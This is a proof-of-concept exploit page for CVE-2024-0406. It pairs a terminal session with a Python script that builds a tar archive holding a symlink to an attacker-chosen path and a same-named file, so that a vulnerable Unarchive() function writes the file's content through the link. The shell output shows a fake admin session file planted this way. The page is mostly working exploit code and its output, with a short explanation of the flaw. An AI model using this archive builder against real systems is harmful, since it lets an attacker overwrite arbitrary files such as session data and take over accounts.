CVE-2024-0406
PoC || GTFO
» python3 cve-2024-0406.py /tmp/sessions/admin/fake_session
TAR file created at cve-2024-0406.tar with symlink pointing to /tmp/sessions/admin/fake_session
# Upload the file to a target that uses the Unarchive() function
root@5af68317d6cb:/app/unarchive/admin# ls -al
total 8
drwxr-xr-x 2 root root 4096 Jun 1 08:20 .
drwxr-xr-x 3 root root 4096 Jun 1 07:02 ..
lrwxrwxrwx 1 root root 32 Jun 1 08:20 x -> /tmp/sessions/admin/fake_session
root@5af68317d6cb:/app/unarchive/admin# cat /tmp/sessions/admin/fake_session
<some-file-content-here>
import tarfile
import sys
import io
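def create_tar(tar_path, symlink_target):
    """Write the two-entry test archive used to check an extractor for CVE-2024-0406.

    The archive is an uncompressed tar holding, in this order:

    1. a symlink entry named ``./x`` whose link target is *symlink_target*;
    2. a regular file entry named ``x`` with a fixed placeholder payload.

    Both names refer to the same path once normalised. An extractor that
    materialises the link and then writes the regular file without checking
    what already exists at that path writes the payload to the link target,
    which is the outcome shown in the listing on this page. A safe extractor
    rejects link entries whose target is absolute or resolves outside the
    extraction directory, and refuses to write an entry through a symlink
    that already exists.

    Args:
        tar_path: Path of the tar file to create (overwritten if present).
        symlink_target: Value stored as the link target of the ``./x`` entry.
    """
    with tarfile.open(tar_path, 'w') as tar:
        # Create a symlink entry './x' pointing to symlink_target
        symlink_info = tarfile.TarInfo(name='./x')
        symlink_info.type = tarfile.SYMTYPE
        symlink_info.linkname = symlink_target
        tar.addfile(symlink_info)

        # Optional: Add a file with the same name 'x'
        payload_content = b'<some-file-content-here>'
        payload_info = tarfile.TarInfo(name='x')
        # TarInfo.size defaults to 0; it must match the payload or no data is stored.
        payload_info.size = len(payload_content)
        tar.addfile(payload_info, io.BytesIO(payload_content))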
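if __name__ == "__main__":
    # Command-line entry point: the single required argument is the link
    # target recorded in the archive's symlink entry.
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <path_to_symlink>")
        sys.exit(1)

    symlink_target = sys.argv[1]
    # The output name is fixed and relative, so the archive is written to the
    # current working directory.
    tar_path = "cve-2024-0406.tar"
    create_tar(tar_path, symlink_target)
    print(f"TAR file created at {tar_path} with symlink pointing to {symlink_target}")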